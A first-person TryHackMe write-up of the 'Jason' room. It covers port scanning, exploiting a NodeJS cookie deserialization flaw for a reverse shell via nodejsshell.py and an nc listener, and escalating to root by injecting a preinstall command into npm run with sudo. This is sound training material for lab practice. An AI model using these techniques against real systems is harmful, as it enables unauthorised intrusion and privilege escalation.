Jason | TryHackMe writeup

In this article, I will be demonstrating my approach to completing the Jason TryHackMe room.

This room talks about a company that has a weak front-end webserver, so our job is to do a penetration test service for it, to find the vulnerabilities and help them secure their system.

So let's begin

The scope: 10.10.135.87

Let's start by doing a fast Nmap scan for open ports using this command: nmap -p- -T4 10.10.135.87 --open -oN Nmap/Nmap-full-ports

The -p- is to do a full ports scan, -T4 to make the scan faster then the normal one, --open is to show only the open ports, and the -oN is to save the output, as i like always to save all my events.

Oh great, we found two TCP open ports, most likely and by default they are http and ssh, so let's make sure about them, i'm gonna use this command: nmap -p80,22 -A 10.10.135.87 -oN Nmap/Nmap-services-discover.

-p80,22 is to scan the selected ports, -A is to enable OS detection, version detection, script scanning, and traceroute.

So, now we are sure that the port 80 is a web server, and 22 is for SSH

I searched for exploits for these two services version, i did not find anything, so I'm gonna start to enumerating the webserver, i like always to start with directory scanners such as dirb or gobuster, in this case I'll start with dirb using this command: dirb https://10.10.135.87/

So after a while it did not find any files or dires in the default wordlist I used, so I'm gonna start enumerating the web app manually

As we can see, the web app has a form and an input for the email, I'm gonna enter a random mail and intercept?it using burp suite proxy, as we can see, there's a parameter called email, so I'm gonna send it to the repeater to repeat requests manually, and also it sets a base64 cookie session, after I decode it using echo "eyJlbWFpbCI6ImV4YW1wbGVAZXhhbXBsZS5jb20ifQ==" | base64 -d, it was a JavaScript object of the email parameter and its value, so I remembered deserialization vulnerabilities?where the attackers can manipulate serialized objects in order to pass harmful data into the application code.

In order to gain access to the server I had to search more about the NodeJS deserialization vulnerabilities, and I ended up in an interesting article from exploit-db

As they showed, I had to generate a NodeJS shell using nodejsshell.py script you can find it out on Github,

So generating the shell was very easy, using this command: python nodejsshell.py MY IP PORT NUMBER, it does not work on python3, so please make sure you are using python2.8, then serialize it

After we copy the shell, we have to encode it base64 to use it in the web app, I used burp encoder and set it in the session cookie, and ran nc command: nc -nvlp MY_PORT, and after refreshing the page, we got the shell, and to get the shell interactive i used: python3 -c "import pty;pty.spawn('/bin/bash')" && export TERM=xterm

Now we are dylan, so we have to escalate our privilege to super user root, i started by doing sudo -l to check what we can run commands as a super user and yeah we can run npm as a super user

Then i did some researchers to finger out how to exploit it, i ended up in an article saying that we can inject our command in the package.json, and that is what i did i injected the cp /root/root.txt command in the preinstall value and ran sudo /usr/bin/npm i /tmp/shell --unsafe-perm and done, our root flag is on /tmp/flag and of course feel free to change the command to any command you want for example, you can do a reverse tcp and connect to root account :)

Please feel free to give me your feedback about my first CTF writeup.

And of course you can add me on TryHackMe, this is my username: Mohamadalsalty.

TryHackme Link https://tryhackme.com/